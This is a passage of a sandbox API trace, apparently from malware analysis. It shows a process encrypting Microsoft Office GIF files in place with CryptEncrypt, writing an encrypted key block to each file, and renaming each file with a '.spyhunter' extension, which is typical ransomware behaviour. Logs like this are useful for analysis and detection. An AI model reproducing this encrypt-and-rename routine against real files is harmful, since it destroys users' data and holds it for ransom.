(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.921] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.921] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x248fc64*, lpNumberOfBytesWritten=0x248fc24*=0x4, lpOverlapped=0x0) returned 1 [0100.921] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc24*=0x30, lpOverlapped=0x0) returned 1 [0100.922] CloseHandle (hObject=0xb4) returned 1 [0100.922] GetProcessHeap () returned 0x2c0000 [0100.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.922] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF.spyhunter") returned 83 [0100.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14982_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14982_.gif.spyhunter")) returned 1 [0100.923] GetProcessHeap () returned 0x2c0000 [0100.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.923] GetProcessHeap () returned 0x2c0000 [0100.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.923] GetProcessHeap () returned 0x2c0000 [0100.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x338460 | out: hHeap=0x2c0000) returned 1 [0100.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc68 | out: pbBuffer=0x248fc68) returned 1 [0100.923] GetProcessHeap () returned 0x2c0000 [0100.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc60*=0x30) returned 1 [0100.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14981_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.924] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF") returned 73 [0100.924] StrStrW (lpFirst="BD14981_.GIF", lpSrch=".txt") returned 0x0 [0100.924] GetProcessHeap () returned 0x2c0000 [0100.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.924] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc24*=0x164, lpOverlapped=0x0) returned 1 [0100.926] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.926] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc24*=0x164, lpOverlapped=0x0) returned 1 [0100.926] GetProcessHeap () returned 0x2c0000 [0100.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.926] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.926] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x248fc64*, lpNumberOfBytesWritten=0x248fc24*=0x4, lpOverlapped=0x0) returned 1 [0100.926] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc24, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc24*=0x30, lpOverlapped=0x0) returned 1 [0100.926] CloseHandle (hObject=0xb4) returned 1 [0100.927] GetProcessHeap () returned 0x2c0000 [0100.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.927] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF.spyhunter") returned 83 [0100.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14981_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14981_.gif.spyhunter")) returned 1 [0100.928] GetProcessHeap () returned 0x2c0000 [0100.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.928] GetProcessHeap () returned 0x2c0000 [0100.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.928] GetProcessHeap () returned 0x2c0000 [0100.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x338380 | out: hHeap=0x2c0000) returned 1 [0100.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc60 | out: pbBuffer=0x248fc60) returned 1 [0100.928] GetProcessHeap () returned 0x2c0000 [0100.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc58*=0x30) returned 1 [0100.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14980_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF") returned 73 [0100.929] StrStrW (lpFirst="BD14980_.GIF", lpSrch=".txt") returned 0x0 [0100.929] GetProcessHeap () returned 0x2c0000 [0100.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.930] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc1c*=0x1cf, lpOverlapped=0x0) returned 1 [0100.931] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.931] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc1c*=0x1cf, lpOverlapped=0x0) returned 1 [0100.931] GetProcessHeap () returned 0x2c0000 [0100.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.931] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.931] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x248fc5c*, lpNumberOfBytesWritten=0x248fc1c*=0x4, lpOverlapped=0x0) returned 1 [0100.932] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc1c*=0x30, lpOverlapped=0x0) returned 1 [0100.932] CloseHandle (hObject=0xb4) returned 1 [0100.932] GetProcessHeap () returned 0x2c0000 [0100.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.932] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF.spyhunter") returned 83 [0100.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14980_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14980_.gif.spyhunter")) returned 1 [0100.933] GetProcessHeap () returned 0x2c0000 [0100.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.933] GetProcessHeap () returned 0x2c0000 [0100.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.933] GetProcessHeap () returned 0x2c0000 [0100.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3382a0 | out: hHeap=0x2c0000) returned 1 [0100.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc60 | out: pbBuffer=0x248fc60) returned 1 [0100.933] GetProcessHeap () returned 0x2c0000 [0100.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc58*=0x30) returned 1 [0100.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14871_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF") returned 73 [0100.935] StrStrW (lpFirst="BD14871_.GIF", lpSrch=".txt") returned 0x0 [0100.935] GetProcessHeap () returned 0x2c0000 [0100.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.935] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc1c*=0xc2, lpOverlapped=0x0) returned 1 [0100.936] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.936] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc1c*=0xc2, lpOverlapped=0x0) returned 1 [0100.937] GetProcessHeap () returned 0x2c0000 [0100.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.937] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.937] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x248fc5c*, lpNumberOfBytesWritten=0x248fc1c*=0x4, lpOverlapped=0x0) returned 1 [0100.937] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc1c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc1c*=0x30, lpOverlapped=0x0) returned 1 [0100.937] CloseHandle (hObject=0xb4) returned 1 [0100.938] GetProcessHeap () returned 0x2c0000 [0100.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.938] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF.spyhunter") returned 83 [0100.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14871_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14871_.gif.spyhunter")) returned 1 [0100.938] GetProcessHeap () returned 0x2c0000 [0100.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.938] GetProcessHeap () returned 0x2c0000 [0100.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.939] GetProcessHeap () returned 0x2c0000 [0100.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3381c0 | out: hHeap=0x2c0000) returned 1 [0100.939] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc58 | out: pbBuffer=0x248fc58) returned 1 [0100.939] GetProcessHeap () returned 0x2c0000 [0100.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.939] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc50*=0x30) returned 1 [0100.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14870_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF") returned 73 [0100.939] StrStrW (lpFirst="BD14870_.GIF", lpSrch=".txt") returned 0x0 [0100.939] GetProcessHeap () returned 0x2c0000 [0100.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.940] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc14*=0x1a4, lpOverlapped=0x0) returned 1 [0100.941] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.941] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1a4, lpNumberOfBytesWritten=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc14*=0x1a4, lpOverlapped=0x0) returned 1 [0100.941] GetProcessHeap () returned 0x2c0000 [0100.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.941] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.941] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x248fc54*, lpNumberOfBytesWritten=0x248fc14*=0x4, lpOverlapped=0x0) returned 1 [0100.941] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc14*=0x30, lpOverlapped=0x0) returned 1 [0100.942] CloseHandle (hObject=0xb4) returned 1 [0100.942] GetProcessHeap () returned 0x2c0000 [0100.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.942] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF.spyhunter") returned 83 [0100.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14870_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14870_.gif.spyhunter")) returned 1 [0100.942] GetProcessHeap () returned 0x2c0000 [0100.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.943] GetProcessHeap () returned 0x2c0000 [0100.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.943] GetProcessHeap () returned 0x2c0000 [0100.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3380e0 | out: hHeap=0x2c0000) returned 1 [0100.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc58 | out: pbBuffer=0x248fc58) returned 1 [0100.943] GetProcessHeap () returned 0x2c0000 [0100.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc50*=0x30) returned 1 [0100.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14869_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF") returned 73 [0100.946] StrStrW (lpFirst="BD14869_.GIF", lpSrch=".txt") returned 0x0 [0100.946] GetProcessHeap () returned 0x2c0000 [0100.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.946] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc14*=0xc4, lpOverlapped=0x0) returned 1 [0100.947] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.947] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc14*=0xc4, lpOverlapped=0x0) returned 1 [0100.947] GetProcessHeap () returned 0x2c0000 [0100.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.947] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.947] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x248fc54*, lpNumberOfBytesWritten=0x248fc14*=0x4, lpOverlapped=0x0) returned 1 [0100.948] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc14, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc14*=0x30, lpOverlapped=0x0) returned 1 [0100.948] CloseHandle (hObject=0xb4) returned 1 [0100.948] GetProcessHeap () returned 0x2c0000 [0100.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.948] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF.spyhunter") returned 83 [0100.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14869_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14869_.gif.spyhunter")) returned 1 [0100.949] GetProcessHeap () returned 0x2c0000 [0100.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.949] GetProcessHeap () returned 0x2c0000 [0100.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.949] GetProcessHeap () returned 0x2c0000 [0100.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x338000 | out: hHeap=0x2c0000) returned 1 [0100.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc50 | out: pbBuffer=0x248fc50) returned 1 [0100.949] GetProcessHeap () returned 0x2c0000 [0100.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc48*=0x30) returned 1 [0100.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14868_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF") returned 73 [0100.950] StrStrW (lpFirst="BD14868_.GIF", lpSrch=".txt") returned 0x0 [0100.950] GetProcessHeap () returned 0x2c0000 [0100.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.950] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc0c*=0x1a3, lpOverlapped=0x0) returned 1 [0100.951] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe5d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.951] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1a3, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc0c*=0x1a3, lpOverlapped=0x0) returned 1 [0100.951] GetProcessHeap () returned 0x2c0000 [0100.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.951] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.951] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x248fc4c*, lpNumberOfBytesWritten=0x248fc0c*=0x4, lpOverlapped=0x0) returned 1 [0100.951] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc0c*=0x30, lpOverlapped=0x0) returned 1 [0100.951] CloseHandle (hObject=0xb4) returned 1 [0100.952] GetProcessHeap () returned 0x2c0000 [0100.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.952] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF.spyhunter") returned 83 [0100.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF" (normalized: 